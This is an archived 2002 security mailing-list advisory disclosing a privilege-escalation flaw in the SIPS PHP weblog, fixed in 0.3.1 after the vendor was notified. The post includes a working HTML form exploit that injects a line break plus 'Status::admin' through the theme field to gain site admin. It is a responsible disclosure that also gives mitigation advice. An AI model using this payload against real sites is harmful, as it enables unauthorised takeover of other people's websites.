SIPS - vulnerable to anyone gaining admin access.

From: b0iler _ (b0ilerat_private)
Date: Mon Feb 11 2002 - 22:13:11 PST

Next message: pre: "[GSA2002-01] Web browsers ignore the Content-Type header, thus allowing cross-site scripting"

Previous message: 3APA3A: "dH & SECURITY.NNOV: buffer overflow in mshtml.dll"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#!/exploit/by/b0iler
# sips - http://sourceforge.net/projects/sips/
# versions lower than 0.3.1

Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing 
system written in PHP. It is aimed at those with access to databaseless, 
PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a 
simple link index like Yahoo!."

Ok, this one took awhile to find since the code is long, but atleast it was 
fairly easy to read.  The script works much like phpnuke or slashcode, SIPS 
stands for Simple Internet Publishing System.  The problem that I found was 
when a user selects a theme to use it is written in their database file.  
Then when a user goes to use admin.php it just checks if the password for 
the user is correct and if they have the value Status equal to admin in 
their database. So I did alittle playing around and got a theme to do a 
linebreak and write Status::admin onto the end of the user's database.  This 
makes the user an admin of the script giving them complete control over the 
site.

Key to securing this code is to filter all input, even if you think it won't 
be changed by the user.. it can be.  Also checking to make sure the theme 
exists might be good.  To exploit this we just need to change the theme's 
page to something like this:

<form action="http://www.site.com/sips/htdocs/preferences.php" 
method="post">
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme"></form>

Here we submit a theme with the value of:

Default -linebreak
Status::admin -linebreak (SIPS chops the theme input).

This will change an account from something like this:

bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0ilerat_private
Theme::default
Timezone::Greenwich Mean

to something like this:

bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0ilerat_private
Timezone::Greenwich Mean
Theme::default
Status::admin

The Status::admin allows you to use 
http://www.site.com/sips/htdocs/admin/index.php, which will give you total 
control over SIPS (pretty much the whole site).

The author was contacted on 2/1/02 and replied the same day.  Author updated 
to version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem 
and possible solutions: http://sips.sourceforge.net/adminvul.html

-http://b0iler.advknowledge.net


_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

Next message: pre: "[GSA2002-01] Web browsers ignore the Content-Type header, thus allowing cross-site scripting"
Previous message: 3APA3A: "dH & SECURITY.NNOV: buffer overflow in mshtml.dll"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 13 2002 - 14:52:29 PST